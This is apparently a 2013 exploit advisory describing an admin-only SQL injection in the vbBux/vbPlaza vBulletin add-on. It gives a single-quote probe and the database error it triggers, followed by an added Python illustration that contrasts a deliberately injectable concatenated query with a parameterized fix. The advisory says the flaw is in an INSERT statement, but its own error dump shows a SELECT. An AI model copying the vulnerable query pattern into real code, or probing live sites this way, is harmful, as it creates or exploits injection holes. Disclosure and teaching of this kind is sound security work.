vbBux and vbPlaza v4 SQLI

2013.08.12
Credit: n3tw0rk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: vbBux and vbPlaza v4 SQLI
# Author(s): n3tw0rk (twitter.com/n3tw0rkgod)
# Contact: Mail: infectedelite@gmail.com
# Product: 4.0.3 and below
# Software Version x.x.x
# Product Download: http://www.vbulletin.org/forum/showthread.php?t=270271
# Homepage: d4tabase.com
# _____________________________________________________________

The exploit is caused by a variable named 'vbplaza_lottery_history' not being sanitized before it is used within an INSERT INTO statement.

POC

You will need AdminCP access. Go to http://localhost/admincp/vbplaza_lottery.php?do=searchhistory, then in the "force read order" column put a ' into the search bar. The result should show:

Database error in vBulletin 4.2.1:
Invalid SQL:
SELECT COUNT(*) AS count
FROM vbplaza_lottery_history
WHERE 1=1
AND (lotteryid = ');

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 3
Error Number  : 1064
Request Date  : Sunday, August 11th 2013 @ 05:17:53 PM
Error Date    : Sunday, August 11th 2013 @ 05:17:54 PM
Script        : http://localhost/admincp/vbplaza_lottery.php?do=findhistory
Referrer      : http://localhost/admincp/vbplaza_lottery.php?do=searchhistory
IP Address    : ::1
Username      : n3tw0rk
Classname     : vB_Database
MySQL Version : 5.5.27
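The failure above comes from a request value being spliced into the SQL text of the history search. The following is an added illustration, not code from the advisory or from vbPlaza: it rebuilds the query shape shown in the error in Python with sqlite3 standing in for vBulletin's PHP/MySQL, and the table schema and rows are constructed for the example. The unsafe variant reproduces the syntax error the advisory shows for a single quote; the bound-parameter variant treats the same input as data.

```python
import sqlite3

# Constructed schema and rows; table and column names follow the advisory's error.
SCHEMA = """
CREATE TABLE vbplaza_lottery_history (
    historyid INTEGER PRIMARY KEY,
    lotteryid INTEGER NOT NULL,
    userid    INTEGER NOT NULL
);
INSERT INTO vbplaza_lottery_history (lotteryid, userid)
VALUES (1, 10), (1, 11), (2, 12);
"""


def _db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_history_unsafe(conn, lotteryid):
    """Vulnerable form: the request value is concatenated into the statement,
    mirroring "SELECT COUNT(*) ... WHERE 1=1 AND (lotteryid = '...')".
    A quote in the input closes the literal, so the input becomes SQL syntax."""
    sql = ("SELECT COUNT(*) AS count FROM vbplaza_lottery_history "
           "WHERE 1=1 AND (lotteryid = '%s')" % lotteryid)
    return conn.execute(sql).fetchone()[0]


def count_history_safe(conn, lotteryid):
    """Fixed form: the value is passed as a bound parameter, so quotes stay data."""
    sql = ("SELECT COUNT(*) AS count FROM vbplaza_lottery_history "
           "WHERE 1=1 AND (lotteryid = ?)")
    return conn.execute(sql, (lotteryid,)).fetchone()[0]


def demo(value):
    """Run both variants on one input. Returns (unsafe_result, safe_result),
    each an int count or the class name of the database error that was raised."""
    conn = _db()
    try:
        unsafe = count_history_unsafe(conn, value)
    except sqlite3.Error as exc:
        unsafe = type(exc).__name__
    safe = count_history_safe(conn, value)
    conn.close()
    return unsafe, safe


if __name__ == "__main__":
    print(demo("1"))   # a normal search: both variants agree
    print(demo("'"))   # the advisory's probe: syntax error vs. an empty result
```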

References:

http://www.vbulletin.org/forum/showthread.php?t=270271